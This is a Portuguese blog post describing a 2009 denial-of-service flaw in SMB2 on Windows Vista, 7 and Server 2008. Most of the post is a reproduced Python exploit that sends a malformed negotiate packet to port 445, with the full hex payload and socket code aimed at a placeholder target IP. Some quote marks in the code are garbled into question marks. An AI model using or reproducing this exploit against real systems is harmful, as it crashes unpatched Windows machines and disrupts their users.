http://skamason.com/7b9R

http://skamason.com/7b9R

quarta-feira, 4 de julho de 2012

### MS Windows Vista / 7 / 2008 Server- Exploit DOS ### 9 09 2009

Ao ser executado o exploit estabelece comunicação com o alvo e através da porta 445 e causa o DOS no alvo utilizando o protocolo SMB, que tem um falha ao tratar cabeçalhos mal formados que são utilizados no início da comunicação entre cliente e servidor, para determinar qual a versão do protocolo SMB que será utilizada na comunicação. Sabendo desta falha é enviado um payload com cabeçalho mal formado que acaba causando um despejo de memória e é exibida instantaneamente a tela azul da morte na máquina alvo.

Abaixo segue o fonte do exploit (extraído do site milw0rm aqui) que diga-se de passagem é extremamente simples …

#!/usr/bin/python

# When SMB2.0 recieve a “&” char in the “Process Id High” SMB header field it dies with a

# PAGE_FAULT_IN_NONPAGED_AREA

from socket import socket

from time import sleep

host = “IP_ADDR”, 445

buff = (

“\x00\x00\x00\x90? # Begin SMB header: Session message

“\xff\x53\x4d\x42? # Server Component: SMB

“\x72\x00\x00\x00? # Negociate Protocol

“\x00\x18\x53\xc8? # Operation 0×18 & sub 0xc853

“\x00\x26?# Process ID High: –>  :)   normal value should be “\x00\x00?

“\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe”

“\x00\x00\x00\x00\x00\x6d\x00\x02\x50\x43\x20\x4e\x45\x54?

“\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31?

“\x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00?

“\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57?

“\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61?

“\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c”

“\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c”

“\x4d\x20\x30\x2e\x31\x32\x00\x02\x53\x4d\x42\x20\x32\x2e”

“\x30\x30\x32\x00?

)

s = socket()

s.connect(host)

s.send(buff)

s.close()

Nenhum comentário:

Postar um comentário